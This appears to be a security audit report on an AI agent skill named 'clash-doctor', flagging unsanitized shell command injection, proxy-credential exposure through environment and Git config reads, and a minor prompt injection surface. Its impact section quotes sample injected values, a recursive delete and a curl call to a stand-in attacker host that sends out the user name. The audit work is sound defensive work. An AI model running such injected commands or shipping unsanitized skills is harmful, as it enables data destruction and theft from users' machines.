clash-doctor
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH; COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill is vulnerable to shell command injection via the `$ARGUMENTS` variable.
  - Evidence: The skill takes the target domain from `$ARGUMENTS` and assigns it to the `TARGET` variable in multiple shell blocks (e.g., `TARGET="$ARGUMENTS"`). This variable is then used in commands like `nslookup $TARGET`, `ping -c 3 $TARGET`, and `curl ... https://$TARGET` without any sanitization or escaping.
  - Impact: An attacker could provide an argument such as `; rm -rf / ;` or `; curl http://attacker.com/$(whoami) ;` to execute arbitrary system commands with the permissions of the agent.
- DATA_EXFILTRATION (MEDIUM): The skill performs significant local reconnaissance and environment discovery.
  - Evidence:
    - Environment Variables: It executes `env | grep -i -E '(proxy|...)'`, which can expose sensitive credentials if authentication is embedded in proxy URLs (e.g., `http://user:password@proxy`).
    - Git Configuration: It reads global Git configurations (`git config --global --get http.proxy`).
    - Port Scanning: It uses `lsof` to scan for listening processes on common proxy ports (7890, 9090, etc.), identifying local services.
    - System Configuration: It uses `networksetup` on macOS to extract detailed network interface and proxy settings.
- PROMPT_INJECTION (LOW): The skill allows the user to influence the logic via the target domain argument.
  - Evidence: Because the input is ingested into a diagnostic prompt that uses a "judgment matrix," a carefully crafted argument could potentially confuse the agent's logic, though this is primarily a surface for the command injection described above.
Recommendations
- AI detected serious security threats
Audit Metadata